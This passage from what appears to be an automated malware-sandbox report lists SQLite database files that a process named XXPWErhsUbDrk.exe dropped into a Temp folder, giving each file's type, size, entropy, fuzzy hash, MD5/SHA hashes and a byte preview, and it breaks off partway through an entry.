SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\i6P9jd53Vj

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\iQZ54TbYWs

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\iXll3tAcUc

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ioPbfUZlBC

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\j0BXfVZHuH

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\j5j4H0Ug7O

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jJ2yvtGhoy

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jKir4W2c7N

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jTXpo6ufDg

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jwFzc1Bwjm

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\k2kD7gtsCl

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\k98GPMvgV8

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\kMMy9bcjw2

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lJ3sVUClNk

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lTqbKB97Ii

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lWx44ZM5Bo

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lbde1gtHxg

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\liCbHlhSOV

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ltBumxNsBh

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\m8KnMmm9M6

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\mKRzB2QGO2

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\mOVdiwrw9I

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\mcGwTmEnb0

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\mn2jOvyUyv

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nBchxBpjRS

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nMhddhVySr

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
